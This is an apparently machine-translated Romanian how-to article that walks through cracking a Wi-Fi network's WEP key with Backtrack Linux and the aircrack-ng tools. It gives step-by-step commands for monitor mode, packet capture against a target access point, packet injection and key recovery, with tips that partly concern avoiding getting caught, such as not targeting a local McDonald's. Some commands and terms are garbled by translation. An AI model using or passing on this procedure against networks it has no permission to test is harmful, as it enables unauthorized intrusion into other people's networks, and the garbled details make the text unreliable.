Încălcarea oricărei coduri sau coduri de criptare implică cunoașterea câtorva lucruri. În primul rând, trebuie să știți că există o schemă de criptare. În al doilea rând, trebuie să știți cum funcționează criptarea. Încălcarea manuală a oricărui cod este aproape imposibilă; din fericire, puteți rupe criptarea WEP dacă utilizați un program de detectare a pachetelor.
Pași
Pasul 1. Utilizați Linux
Windows nu poate adulmeca pachete WEP, dar puteți utiliza un CD bootabil de Linux.
Pasul 2. Obțineți un program de detectare a pachetelor
Backtrack este o opțiune frecvent utilizată. Descărcați imaginea iso și ardeți-o pe un CD / DVD bootabil.
Pasul 3. Porniți Linux și Backtrack
Utilizați CD-urile / DVD-urile de pornire.
Rețineți că nu este necesar ca acest sistem de operare să fie instalat pe hard disk. Asta înseamnă că, de fiecare dată când opriți Backtrack-ul, toate datele dvs. vor fi pierdute
Pasul 4. Selectați o opțiune de pornire
Următorul ecran Backtrack se va afișa după pornire. Schimbați opțiunea cu tastele săgeată sus și jos și selectați una. Acest tutorial va utiliza prima opțiune.
Pasul 5. Încărcați interfața grafică prin baza de comandă
În această opțiune, Backtrack este pornit pe baza de comandă. Tastați comanda: startx pentru a continua.
Pasul 6. Faceți clic pe butonul terminal din partea stângă jos
Va fi a cincea opțiune.
Pasul 7. Așteptați ca terminalul de comandă Linux să se deschidă
Pasul 8. Vizualizați tipul WLAN
Introduceți următoarea comandă: "airmon-ng" (fără ghilimele). Ar trebui să vedeți ceva de genul wlan0 sub Interfață.
Pasul 9. Obțineți toate informațiile necesare pentru punctul de acces
Introduceți următoarea comandă: "airodump-ng wlan0" (fără ghilimele). Ar trebui să obțineți trei lucruri:
- BSSID
- Canal
- ESSID (Nume AP)
-
Iată ce a apărut cazul tutorial:
- BSSID 00: 17: 3F: 76: 36: 6E
- Numărul canalului 1
- ESSID (Nume AP) Suleman
Pasul 10. Introduceți următoarea comandă
Acesta va folosi exemplul de informații de mai sus, dar ar trebui să vă conectați propriile. Comandă: "airodump-ng -w wep -c 1 - bssid 00: 17: 3F: 76: 36: 6E wlan0" (fără ghilimele).
Pasul 11. Permiteți configurarea să înceapă
Pasul 12. Deschideți o nouă fereastră de terminal
Tastați următoarea comandă, înlocuind valorile cu propriul BSSID, Canal și ESSID. Comandă: "aireplay-ng -1 0 –a 00: 17: 3f: 76: 36: 6E wlan0" (fără ghilimele).
Pasul 13. Deschideți o altă fereastră de terminal nouă
Tastați următoarea comandă: "aireplay-ng -3 –b 00: 17: 3f: 76: 36: 6e wlan0" (fără ghilimele).
Pasul 14. Permiteți configurarea să înceapă
Pasul 15. Reveniți la prima fereastră a terminalului
Pasul 16. Permiteți ca datele din această fereastră să ajungă la 30000 sau mai mult
Va dura 15 până la 60 de minute (sau mai mult), în funcție de semnalul wireless, hardware și încărcarea punctului de acces.
Pasul 17. Mergeți la a treia fereastră a terminalului și apăsați Ctrl + c
Pasul 18. Trageți în sus directoarele
Tastați următoarea comandă: "dir" (fără ghilimele). Aceasta va afișa directoarele salvate pe acesta în timpul decriptării.
Pasul 19. Folosiți un fișier de limită
Pentru exemplu, ar fi următorul: "aircrack-ng web-02.cap" (fără ghilimele). Configurarea prezentată mai jos va începe.
Pasul 20. Rupeți cheia criptată WEP
După finalizarea acestei configurări, veți putea sparge cheia. În acest exemplu, a fost {ADA2D18D2E}.
sfaturi
- Legile privind securitatea rețelei pot diferi de la un loc la altul. Asigurați-vă că știți tot ce trebuie să știți și fiți pregătiți să faceți față consecințelor acțiunilor dvs. în timp ce încercați acest lucru.
- Dacă apare o eroare spunând că placa dvs. de rețea actuală este ocupată, încercați comanda „airmon-ng wlan0” (fără ghilimele) și apoi repetați comenzile din acest ghid folosind mon0 în locul wlan0 de fiecare dată.
- Probabil că veți putea găsi versiuni deja compilate ale majorității programelor de care veți avea nevoie.
- Multe programe de sniffing, cum ar fi Wireshark (cunoscut anterior ca Ethereal), precum și Airsnort și Kismet, sunt disponibile ca cod sursă. Veți avea nevoie de un anumit fundal în compilarea codului sursă pentru Linux sau Windows pentru a utiliza Airsnort sau Kismet. Wireshark / Ethereal vine cu un program de instalare sau puteți descărca codul sursă.
- Backtrack linux este acum redenumit și distribuit ca Kali linux. Poate fi descărcat de la Kali Linux Homepage
Avertizări
- Aveți nevoie de un card wifi specific care să fie compatibil cu programele pe care le utilizați
- Aveți grijă întotdeauna care este ținta dvs. Nu este inteligent să intri în McDonalds-ul tău local și să încerci să le spargi plasa. Șansele ca tu să fii prins cresc de zece ori.
- Aceste informații trebuie utilizate etic. Utilizarea greșită a acestor informații poate fi ilegală atât la nivel local, cât și federal.